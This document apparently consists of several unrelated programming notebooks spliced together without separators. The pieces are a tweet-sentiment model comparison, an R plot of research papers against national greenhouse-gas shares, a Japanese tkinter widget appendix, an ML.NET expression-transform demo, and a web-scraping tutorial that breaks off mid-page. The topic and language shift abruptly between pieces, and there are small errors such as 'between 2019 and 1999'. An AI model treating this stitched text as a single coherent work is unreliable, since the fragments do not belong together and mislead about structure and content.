sum(SVM_rbf_pred), sum(bagging_pred), sum(boosting_pred), sum(LR_pred), sum(RF_pred)] models_resAs can be seen in the above chart, the number of non-negative tweets predicted by NB, boosting model, and RF make more sense than the others, given that the project information says most of the obs are negative. To look into details and compare these three models, extract their results as a CSV file named "models_comparison.csv", and screen the non-negative tweets predicted by each model using manual judgement.models_comparison = test models_comparison['Boosting_pred'] = boosting_pred models_comparison['RF_pred'] = RF_pred models_comparison['NB_pred'] = NB_pred models_comparison models_comparison.to_csv(r'models_comparison.csv')After comparing the three models, the RF model tends to predict more accurately. Select RF as the model to use.Details will be provided in the following part. 5. Output generation 5.1 Screen the predictions of RF modelUse the CSV file extracted above, for the non-negative tweets predicted by each models, screen the tweets with manual judgement by putting myself in the shoes of the tweeting customer. Calculate the precisions for each model's classification, and the highest one is from RF model.Create a dataframe to display the results. The column "evaluation" representing the evaluation of whether the classification is correct: 1 being correct, 0 being wrong. It is from the comparison of manual judgement and RF predictions.df_output = pd.read_csv('RF_pred_pos.csv') df_output = df_output[df_output['RF_pred']==1].iloc[:,1:] df_output['label'] = df_output['label'].astype(int) df_output5.2 Generate the output CSV fileCreate the final output dataframe with the required three columns and extract it as the required CSV file.output = df_output[['id', 'label', 'tweet']] output.reset_index(inplace=True) output.drop(columns = ['index'], inplace=True) output.columns = ['id', 'evaluation', 'non-negative tweets'] output output.to_csv(r'fangyuan_liu.csv', index=False)5.3 Calculate the precision of classificationAccording to the definition, precision is calculated by first summing up the second column "evaluation" and then dividing the sum by the total number of rows, which is exactly the mean of second column "evaluation". Calculatioin shows that, the precision of classification is around:__0.74__.Precision = output.mean()['evaluation'] print('The precision of classification is:', round(Precision, 2))The precision of classification is: 0.74Database with one row for each publication-country associationpath <- "../5_Final_databases/output/database_multi_rows_each_paper_one_per_country.csv" df <- read_csv(path) sprintf("%i x %i dataframe", nrow(df), ncol(df))Parsed with column specification: cols( .default = col_double(), Country = col_character(), title = col_character(), ISO_3 = col_character(), Region = col_character(), authors = col_character(), source = col_character(), doi = col_character(), abstract = col_character(), author_keywords = col_character(), model = col_character(), scopus_number = col_character(), WOS_number = col_character() ) See spec(...) for full column specifications.Importing CAIT DatabaseBased on https://www.climatewatchdata.org/data-explorer/historical-emissions?historical-emissions-data-sources=cait&historical-emissions-gases=all-ghg&historical-emissions-regions=All%20Selected&historical-emissions-sectors=total-including-lucf&page=1path_CAIT <- "../0_Reference_files/CAIT_GHG_2016.csv" df_CAIT <- read_csv(path_CAIT) sprintf("%i x %i dataframe", nrow(df_CAIT), ncol(df_CAIT)) head(df_CAIT,1)Parsed with column specification: cols( ISO_3 = col_character(), Country = col_character(), `Data source` = col_character(), Sector = col_character(), Gas = col_character(), Unit = col_character(), GHG_incl_landuse = col_double() )Count publications and GHG emissions associated to each ISO3 and respectively the relative proportion of the databaseoptions(scipen=10000) data <- df %>% select(ISO_3,Region)%>% group_by(ISO_3,Region)%>% summarise(count_papers = n())%>% ungroup()%>% inner_join(df_CAIT, by ='ISO_3')%>% mutate(ratio_papers = round(count_papers /4691,digit=4), ratio_GHG_incl_landuse = round(GHG_incl_landuse / sum(GHG_incl_landuse), digit=4)) head(data,2) sprintf("%i x %i dataframe", nrow(data), ncol(data))Plotoptions(repr.plot.width=12, repr.plot.height=12) plot <- ggplot(data%>% filter(count_papers>10), aes(x=ratio_GHG_incl_landuse, y=ratio_papers, size =count_papers, color = Region, label = Country)) + geom_point(alpha=2) + scale_size(range = c(0.01, 15), breaks=c(10,20,50,100,300,500,1000), name="Number of papers") + scale_fill_manual(values=c('Asia'='darkorange', 'European Union'='#7CAE00', 'Europe'='seagreen4', 'North America'='darkblue', 'Latin America'='dodgerblue2', 'Africa'='orchid', 'Oceania'='#CD9600', 'Antarctica'='#CAB2D6'))+ theme_ipsum() + geom_text_repel( data = subset(data, count_papers>20 & ratio_GHG_incl_landuse > ratio_papers), nudge_x = 0.2 - log10(subset(data, count_papers>20 & ratio_GHG_incl_landuse > ratio_papers)$ratio_GHG_incl_landuse), segment.size = 0.2, segment.color = "grey50", direction = "y", hjust = 0, size=5 ) + geom_text_repel( data = subset(data, count_papers> 20 & ratio_GHG_incl_landuse < ratio_papers), nudge_x = log10(subset(data, count_papers>20 & ratio_GHG_incl_landuse < ratio_papers)$ratio_GHG_incl_landuse), direction = "y", segment.size = 0.2, segment.color = "grey50", hjust = 1, size=5 ) + scale_x_continuous(name="\n Country share in World GHG emissions", limits = c(NA, 0.50), trans='log10') + scale_y_continuous(name="Country share of papers \n",limits=c(NA, 0.30),trans ='log10') + geom_abline(intercept = 0, slope = 1) + theme(legend.title = element_text(size = 16,face ="bold"), legend.text = element_text(size = 16), legend.position="right", axis.text.x = element_text(size = 16), axis.text.y = element_text(size = 16), axis.title.x = element_text(size = 16, hjust = 0.5,face ="bold"), axis.title.y = element_text(size = 16, hjust = 0.5,face ="bold") )+ guides(color = guide_legend(override.aes = list(shape = 19, size=5))) plot ggsave('./output/Fig2_comparison_papers_emissions.png', height=12, width=12, plot=plot)Chapter6: 付録 6.1 ウイジットの使用例 6.1.1 ウインドウオプション# リスト6.1.1: ウインドウのオプション import tkinter as tk root = tk.Tk() root.geometry("300x100") # ウインドウ名 root.title("TestApp") # アイコン root.iconphoto(True, tk.PhotoImage(file = "Images/icon.png")) # ウインドウサイズの固定 root.resizable(width = False, height = False) root.mainloop()※ リスト6.1.1のウインドウオプションをリセットしたい場合は、カーネルをリスタートしてください。 6.1.2 メニューバーの階層追加# リスト6.1.2: メニューバーに第2階層の追加 import tkinter as tk root = tk.Tk() root.geometry("300x100") # メニューバーの作成 menubar = tk.Menu(root) root.configure(menu = menubar) # Fileメニュー filemenu = tk.Menu(menubar, tearoff = 0) menubar.add_cascade(label = "File", menu = filemenu) # >Open... open_menu = tk.Menu(menubar, tearoff = 0) filemenu.add_cascade(label = "Open...", menu = open_menu) open_menu.add_command(label = "txt File (*.txt)") open_menu.add_command(label = "asc File (*.asc)") # >Exit filemenu.add_command(label = "Exit") root.mainloop()6.1.3 その他のメッセージボックス# リスト6.1.3: showinfo import tkinter as tk from tkinter import messagebox root = tk.Tk() # ウインドウの非表示 root.withdraw() # showinfo mb = messagebox.showinfo("title", "message") print(mb) # リスト6.1.4: showwarning import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # showwarning mb = messagebox.showwarning("title", "message") print(mb) # リスト6.1.5: askquestion import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # askquestion mb = messagebox.askquestion("title", "message") print(mb) # リスト6.1.6: askyesno import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # askyesno mb = messagebox.askyesno("title", "message") print(mb) # リスト6.1.7: askokcancel import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # askokcancel mb = messagebox.askokcancel("title", "message") print(mb) # リスト6.1.8: askretrycancel import tkinter as tk from tkinter import messagebox root = tk.Tk() root.withdraw() # askretrycancel mb = messagebox.askretrycancel("title", "message") print(mb)True6.1.4 シンプルダイアログ# リスト6.1.8: simpledialog import tkinter as tk # simpledialogのインポート import tkinter.simpledialog as simpledialog root = tk.Tk() root.withdraw() # simpledialog data = simpledialog.askstring("title", "message") print(data)6.1.5 スピンボックス、チェックボタン ※) 他のセルでroot.withdraw()を実行している場合は、カーネルをリスタートしてください。# リスト6.1.9: スピンボックスとチェックボタン import tkinter as tk from tkinter import ttk root = tk.Tk() # スピンボックス spinbox = tk.StringVar() spinbox.set(0) sp = ttk.Spinbox(root, textvariable = spinbox, from_=-5, to=5, width = 10) sp.pack() # チェックボタン checkbtn = tk.StringVar() checkbtn.set("NO") chk = ttk.Checkbutton(root, variable = checkbtn, text = "Check", onvalue = "OK", offvalue = "NO") chk.pack() root.mainloop() # リスト6.1.10: リスト6.1.9へのボタンの追加 import tkinter as tk from tkinter import ttk root = tk.Tk() # スピンボックス spinbox = tk.StringVar() spinbox.set(0) sp = ttk.Spinbox(root, textvariable = spinbox, from_=-5, to=5, width = 10) sp.pack() # チェックボタン checkbtn = tk.StringVar() checkbtn.set("NO") chk = ttk.Checkbutton(root, variable = checkbtn, text = "Check", onvalue = "OK", offvalue = "NO") chk.pack() # ボタン push_button = tk.Button(root, text = "Push", command = lambda: print(sp.get(), checkbtn.get())) push_button.pack() root.mainloop()5 OK6.1.6 辞書型のコンボボックス# リスト6.1.11: 辞書型のコンボボックス import tkinter as tk from tkinter import ttk root = tk.Tk() # コンボボックス combo_dict = {"One": "1", "Two": "2", "Three": "3", "Four": "4", "Five": "5"} cb = ttk.Combobox(root, values = list(combo_dict.keys())) cb.pack() root.mainloop() # リスト6.1.12: リスト6.1.11へのボタンの追加 import tkinter as tk from tkinter import ttk root = tk.Tk() # コンボボックス combo_dict = {"One": "1", "Two": "2", "Three": "3", "Four": "4", "Five": "5"} cb = ttk.Combobox(root, values = list(combo_dict.keys())) cb.pack() # ボタン push_button = tk.Button(root, text = "Push", command = lambda: print(combo_dict[cb.get()])) push_button.pack() root.mainloop()36.1.7 ボタンへの画像の追加# リスト6.1.13: ボタンへの画像の追加 import tkinter as tk root = tk.Tk() # 画像指定 pb_image = tk.PhotoImage(file = "Images/icon.png") # ボタン push_button = tk.Button(root, text = " Push", image = pb_image, compound = tk.LEFT, width = 100, height = 30) push_button.pack(padx = 30, pady = 30) root.mainloop()6.1.8 画像の追加# リスト6.1.14: 画像(キャンバス)の設置 import tkinter as tk root = tk.Tk() # 画像指定 test_image = tk.PhotoImage(file = "Images/test.png") # キャンパス canvas = tk.Canvas(root, width = 250, height = 250) canvas.pack(padx = 10, pady = 10) canvas.create_image(0, 0, image = test_image, anchor = tk.NW) root.mainloop()6.1.9 x軸方向のスクロールバー# リスト6.1.15: x軸方向のスクロールバー import tkinter as tk from tkinter import ttk root = tk.Tk() # フレーム frame = ttk.Frame(root, padding = 5) frame.pack(padx = 5, pady = 5) # テキストボックス txtbox = tk.Text(frame, width = 60, height = 20) # スクロールバー作成 # y軸方向 yscroll = tk.Scrollbar(frame, orient = tk.VERTICAL, command = txtbox.yview) txtbox["yscrollcommand"] = yscroll.set yscroll.pack(side = tk.RIGHT, fill = tk.Y) # x軸横方向 xscroll = tk.Scrollbar(frame, orient = tk.HORIZONTAL, command = txtbox.xview) txtbox["xscrollcommand"] = xscroll.set xscroll.pack(side = tk.BOTTOM, fill = tk.X) # テキストボックスの配置 txtbox.pack() root.mainloop()(補足) 「リスト6.1.15: x軸方向のスクロールバー」について ※ x軸方向のスクロールバーを実際にテストしたい場合は、以下のようにコードを変更してください。 リスト6.1.15のTextウイジットの引数で「wrap = "none"」を追加します。 wrapオプションは、テキストボックス中の長い行の折り返しを設定するためのものです。 折返しなし(wrap = "none")に設定することで、x軸方向のスクロールバーが実際に動作するか確認することができます。 テキストボックスの幅以上の文字列を入力すると、x軸方向のスクロールバーが動作します。 - none: 折り返ししない - char: 文字単位で折り返し - word: 単語単位で折り返し 変更前 txtbox = tk.Text(frame, width = 60, height = 20) ↓ 変更後 txtbox = tk.Text(frame, width = 60, height = 20, wrap = "none")# 補足)リスト6.1.15(wrapオプションの追加): x軸方向のスクロールバー import tkinter as tk from tkinter import ttk root = tk.Tk() # フレーム frame = ttk.Frame(root, padding = 5) frame.pack(padx = 5, pady = 5) # テキストボックス txtbox = tk.Text(frame, width = 60, height = 20, wrap = "none") # スクロールバー作成 # y軸方向 yscroll = tk.Scrollbar(frame, orient = tk.VERTICAL, command = txtbox.yview) txtbox["yscrollcommand"] = yscroll.set yscroll.pack(side = tk.RIGHT, fill = tk.Y) # x軸横方向 xscroll = tk.Scrollbar(frame, orient = tk.HORIZONTAL, command = txtbox.xview) txtbox["xscrollcommand"] = xscroll.set xscroll.pack(side = tk.BOTTOM, fill = tk.X) # テキストボックスの配置 txtbox.pack() root.mainloop()6.1.10 テーブル(表)# リスト6.1.16: 基本的なテーブルの作成 import tkinter as tk from tkinter import ttk root = tk.Tk() # テーブルの作成 tree = ttk.Treeview(root, height = 3) # 列の作成 tree["column"] = (1, 2) tree["show"] = "headings" # ヘッダーの定義 tree.heading(1, text = "Status", anchor = tk.W) tree.heading(2, text = "Name", anchor = tk.W) # 列の定義 tree.column(1, width = 80) tree.column(2, width = 160) # 値の挿入 tree.insert("", "end", values = ("Done", "Item1")) tree.insert("", "end", values = ("Pending", "Item2")) # テーブルの配置 tree.pack(padx = 10, pady = 10, fill = tk.BOTH) root.mainloop() # 図6-17.tree["show"] = "headings"をコメントアウトした実行結果 import tkinter as tk from tkinter import ttk root = tk.Tk() # テーブルの作成 tree = ttk.Treeview(root, height = 3) # 列の作成 tree["column"] = (1, 2) #tree["show"] = "headings" # ヘッダーの定義 tree.heading(1, text = "Status", anchor = tk.W) tree.heading(2, text = "Name", anchor = tk.W) # 列の定義 tree.column(1, width = 80) tree.column(2, width = 160) # 値の挿入 tree.insert("", "end", values = ("Done", "Item1")) tree.insert("", "end", values = ("Pending", "Item2")) # テーブルの配置 tree.pack(padx = 10, pady = 10, fill = tk.BOTH) root.mainloop() # リスト6.1.19: ボタンの追加 import tkinter as tk from tkinter import ttk root = tk.Tk() # テーブルの作成 tree = ttk.Treeview(root, height = 3) # 列の作成 tree["column"] = (1, 2) tree["show"] = "headings" # ヘッダーの定義 tree.heading(1, text = "Status", anchor = tk.W) tree.heading(2, text = "Name", anchor = tk.W) # 列の定義 tree.column(1, width = 80) tree.column(2, width = 160) # 値の挿入 tree.insert("", "end", values = ("Done", "Item1")) tree.insert("", "end", values = ("Pending", "Item2")) # テーブルの配置 tree.pack(padx = 10, pady = 10, fill = tk.BOTH) # ボタン push_button = tk.Button(root, text = "Push") push_button.pack(pady = 10) root.mainloop() # リスト6.1.20: テーブルの選択したデータを取得する関数 (get_vule関数) def get_vule(): # 選択した行の取得 slctItems = tree.selection() # 選択した2列目の値を取得 values = tree.item(slctItems[0])["values"][1] # 値を出力 print(values) # リスト6.1.22: テーブルの選択行を出力するコード import tkinter as tk from tkinter import ttk ##### 関数 ##### def get_vule(): slctItems = tree.selection() values = tree.item(slctItems[0])["values"][1] print(values) ##### GUI ##### root = tk.Tk() # テーブル tree = ttk.Treeview(root, height = 3) tree["column"] = (1, 2) tree["show"] = "headings" tree.heading(1, text = "Status", anchor = tk.W) tree.heading(2, text = "Name", anchor = tk.W) tree.column(1, width = 80) tree.column(2, width = 160) tree.insert("", "end", values = ("Done", "Item1")) tree.insert("", "end", values = ("Pending", "Item2")) tree.pack(padx = 10, pady = 10, fill = tk.BOTH) # ボタン push_button = tk.Button(root, text = "Push", command = get_vule) push_button.pack(pady = 10) root.mainloop() # リスト6.1.23: エラーの回避例 def get_vule(): slctItems = tree.selection() if not slctItems: return values = tree.item(slctItems[0])["values"][1] print(values) # リスト6.1.24: テーブルにデータを追加する関数 (insert_vule関数) def insert_vule(): tree.insert("", "end", values = ("Pending", "Item3")) # リスト6.1.25: テーブルにデータを追加するコード import tkinter as tk from tkinter import ttk ##### 関数 ##### def insert_vule(): tree.insert("", "end", values = ("Pending", "Item3")) ##### GUI ##### root = tk.Tk() # フレーム作成 frame = ttk.Frame(root, paddin = 10) frame.pack() # テーブルの作成 tree = ttk.Treeview(frame, height = 3) tree["column"] = (1, 2) tree["show"] = "headings" tree.heading(1, text = "Status", anchor = tk.W) tree.heading(2, text = "Name", anchor = tk.W) tree.column(1, width = 80) tree.column(2, width = 160) tree.insert("", "end", values = ("Done", "Item1")) tree.insert("", "end", values = ("Pending", "Item2")) # スクロールバー作成 yscroll = tk.Scrollbar(frame, orient = tk.VERTICAL, command = tree.yview) yscroll.pack(side = tk.RIGHT, fill = "y") tree["yscrollcommand"] = yscroll.set # テーブルの配置 tree.pack(fill = tk.BOTH) # ボタン push_button = tk.Button(root, text = "Push",command = insert_vule) push_button.pack(pady = 10) root.mainloop() # リスト6.1.26: テーブルの選択したデータを削除する関数 (del_vule関数) def del_vule(): # 選択した値の取得 slctItems = tree.selection() # 削除 tree.delete(slctItems) # リスト6.1.26を実装 import tkinter as tk from tkinter import ttk ##### 関数 ##### def del_vule(): # 選択した値の取得 slctItems = tree.selection() # 削除 tree.delete(slctItems) ##### GUI ##### root = tk.Tk() # テーブル tree = ttk.Treeview(root, height = 3) tree["column"] = (1, 2) tree["show"] = "headings" tree.heading(1, text = "Status", anchor = tk.W) tree.heading(2, text = "Name", anchor = tk.W) tree.column(1, width = 80) tree.column(2, width = 160) tree.insert("", "end", values = ("Done", "Item1")) tree.insert("", "end", values = ("Pending", "Item2")) tree.pack(padx = 10, pady = 10, fill = tk.BOTH) # ボタン push_button = tk.Button(root, text = "Push", command = del_vule) push_button.pack(pady = 10) root.mainloop() # リスト6.1.27: テーブル上の全データを削除する関数 (alldel_vule関数) def alldel_vule(): for child in tree.get_children(): tree.delete(child) # リスト6.1.27を実装 import tkinter as tk from tkinter import ttk ##### 関数 ##### def alldel_vule(): for child in tree.get_children(): tree.delete(child) ##### GUI ##### root = tk.Tk() # テーブル tree = ttk.Treeview(root, height = 3) tree["column"] = (1, 2) tree["show"] = "headings" tree.heading(1, text = "Status", anchor = tk.W) tree.heading(2, text = "Name", anchor = tk.W) tree.column(1, width = 80) tree.column(2, width = 160) tree.insert("", "end", values = ("Done", "Item1")) tree.insert("", "end", values = ("Pending", "Item2")) tree.pack(padx = 10, pady = 10, fill = tk.BOTH) # ボタン push_button = tk.Button(root, text = "Push", command = alldel_vule) push_button.pack(pady = 10) root.mainloop()ML.Net - ExpressionTransform -> Cientista 👋()[![Linkedin Badge](https://img.shields.io/badge/-LinkedIn-blue?style=flat-square&logo=Linkedin&logoColor=white&link=https://www.linkedin.com/in/davi-ramos/)](https://www.linkedin.com/in/davi-ramos/)[![Twitter Badge](https://img.shields.io/badge/-Twitter-1DA1F2?style=flat-square&logo=Twitter&logoColor=white&link=https://twitter.com/Daviinfo/)](https://twitter.com/Daviinfo/)// ML.NET Nuget packages installation #r "nuget:Microsoft.ML"Using C Classusing System; using Microsoft.ML; using Microsoft.ML.Data;Declare data-classes for input data and predictionspublic class SalaryInput { public float YearsExperience; public bool IsManager; public string Title; public int NumberOfTeamsManaged; } public class ExpressionOutput { public int TeamsManagedOutput { get; set; } public float SquareRootOutput { get; set; } public string ToLowerOutput { get; set; } }Evaluatevar context = new MLContext(); var inputData = new List { new SalaryInput { IsManager = false, YearsExperience = 1f, Title = "Developer" }, new SalaryInput { IsManager = true, YearsExperience = 9f, Title = "Director", NumberOfTeamsManaged = 2 }, new SalaryInput { IsManager = false, YearsExperience = 4f, Title = "Analyst" } }; var data = context.Data.LoadFromEnumerable(inputData); var expressions = context.Transforms.Expression("SquareRootOutput", "(x) => sqrt(x)", "YearsExperience") .Append(context.Transforms.Expression("TeamsManagedOutput", "(x, y) => x ? y : 0", nameof(SalaryInput.IsManager), nameof(SalaryInput.NumberOfTeamsManaged))) .Append(context.Transforms.Expression("ToLowerOutput", "(x) => lower(x)", nameof(SalaryInput.Title))); var expressionsTransformed = expressions.Fit(data).Transform(data); var expressionsData = context.Data.CreateEnumerable(expressionsTransformed, reuseRowObject: false); foreach (var expression in expressionsData) { Console.WriteLine($"Square Root - {expression.SquareRootOutput}"); Console.WriteLine($"Teams Managed - {expression.TeamsManagedOutput}"); Console.WriteLine($"To Lower - {expression.ToLowerOutput}"); Console.WriteLine(Environment.NewLine); } Console.ReadLine();Square Root - 1 Teams Managed - 0 To Lower - developer Square Root - 3 Teams Managed - 2 To Lower - director Square Root - 2 Teams Managed - 0 To Lower - analystScraping Files from Websites You need to create a data set that tracks how many companies the SEC suspended between 2019 and 1999. You find the data at:```https://www.sec.gov/litigation/suspensions.shtml``` We want to write a scraper that aggregates:* Date of suspension* Company name* Order* Release (the PDFs in the XX-YYYYY format) The Challenge? Details are actually in PDFs! Demo downloading files from websites There are ```txt``` and ```pdf``` files on:```https://sandeepmj.github.io/scrape-example-page/pages.html```Do the following:1. Download all ```txt``` files.2. Download all ```pdf``` files.3. Download all files as one.# import libraries from bs4 import BeautifulSoup ## scrape info from web pages import requests ## get web pages from server import time # time is required. we will use its sleep function from random import randrange # generate random numbers # from google.colab import files ## code for downloading in google colab # url to scrape url = "https://sandeepmj.github.io/scrape-example-page/pages.html"Turn page into soup## get url and print but hard to read. will do prettify next page = requests.get(url) soup = BeautifulSoup(page.content, "html.parser") print(soup) List of Documents

Documents to Download

  • Junk Li tag
  • Junk Li tag